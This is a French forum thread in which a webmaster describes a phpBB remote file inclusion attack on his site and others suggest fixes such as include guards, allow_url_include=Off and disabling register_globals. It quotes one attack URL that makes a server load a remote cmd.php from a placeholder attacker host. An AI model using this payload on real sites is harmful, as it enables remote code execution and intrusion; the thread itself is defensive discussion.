[RESOLU] Faille de sécurité PHPBB

WRInaute occasionnel
Salut

Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):

Code:
Arbitrary File Inclusion:
http://[target]/includes/functions.php?phpbb_root_path=http://[attacker]/cmd.php

Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451

ou ici:
http://secwatch.org/advisories/1015365/

Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?

Merci d'avance des suggestions et correctifs...
 
WRInaute impliqué
Code:
if ( !defined('IN_PHPBB') && !defined('IN_PORTAL') ) {
	die('Hacking attempt');
	exit;
}
Au début des fichiers de ce genre évite les inclusions comme cela ;)
 
WRInaute passionné
Euh ...

1/ ça date de 2007
2/ ça ne concerne pas PhpBB mais un clode nommé PhpBB XS (renommé depuis en Icy Phoenix).

Donc rien à voir avec PhpBB !
 
WRInaute occasionnel
loran750 a dit:
Euh ...

1/ ça date de 2007
2/ ça ne concerne pas PhpBB mais un clode nommé PhpBB XS (renommé depuis en Icy Phoenix).

Donc rien à voir avec PhpBB !

:roll: Désolé de te contredire, loran750 mais j'utilise bien phpBB 2.0.21
Il se trouve seulement que la faille est a plusieurs niveaux. Tu veux que j'essaye sur ton forum :-D ;-)

darkjukka> Mais il y a cette protection dans le code PHPBB au niveau du fichier common.php deja:
Code:
if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
 
WRInaute impliqué
Je l'ai dans tout mes fichiers includes perso ;)

Et puis ton phpBB n'est pas à jour, c'est la 2.0.23 en ce moment.
 
Nouveau WRInaute
WRInaute passionné
Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.

Code:
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off

Par contre cette option n'est disponible que depuis PHP 5.2.


PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles... :roll:
 
WRInaute occasionnel
Bool a dit:
Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.
Par contre cette option n'est disponible que depuis PHP 5.2.

PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles... :roll:
Merci :) Par contre moi je suis en PHP Version 5.1.6 :-(

En ce qui concerne la remarque sur le register_globals, je sais, c'est dans la TODO list :p
 
Discussions similaires
Haut